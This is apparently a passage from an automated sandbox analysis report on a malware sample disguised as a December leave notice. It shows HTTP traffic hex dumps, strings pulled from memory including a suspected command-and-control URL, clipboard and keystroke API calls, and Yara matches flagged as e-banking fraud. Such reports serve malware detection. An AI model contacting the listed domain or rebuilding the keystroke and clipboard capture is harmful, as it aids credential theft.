20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 
6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: ed04a8f0-3ab8-4ec9-8771-a218b09400f0x-runtime: 0.038671content-length: 18183connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 
6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Nov 2024 15:18:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 15:19:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e02f2c-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: eAdBvdCMNQkVZK.exe, 00000007.00000002.4582285019.0000000005592000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.76kdd.top
Source: eAdBvdCMNQkVZK.exe, 00000007.00000002.4582285019.0000000005592000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.76kdd.top/6rpr/
Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://help.hover.com/home?source=parked
Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.c
Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: Utilman.exe, 00000005.00000002.4579598695.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: Utilman.exe, 00000005.00000003.2697742475.0000000007CC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://twitter.com/hover
Source: Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/?source=parked
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/about?source=parked
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/domains/results
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/email?source=parked
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/privacy?source=parked
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/renew?source=parked
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/tools?source=parked
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/tos?source=parked
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/transfer_in?source=parked
Source: Utilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.instagram.com/hover_domains
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function 0_2_00FD6B0C: OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function 0_2_00FD6D07: OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function 0_2_00FC2B37: GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function 0_2_00FEF7FF: DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2517323526.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4580892352.0000000005940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function 0_2_00F83D19: This is a third-party compiled AutoIt script.
Source: Mandatory Notice for all December Leave and Vacation application.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000000.2105902097.000000000102E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_0a9f226f-6
